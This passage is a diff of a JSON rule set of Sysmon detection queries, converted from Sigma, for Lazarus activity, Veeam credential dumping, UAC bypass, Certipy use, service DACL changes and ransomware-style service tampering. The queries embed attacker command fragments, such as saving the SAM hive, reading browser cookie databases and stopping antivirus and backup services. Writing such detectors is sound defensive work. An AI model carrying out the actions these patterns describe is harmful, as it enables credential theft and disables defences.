"description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' 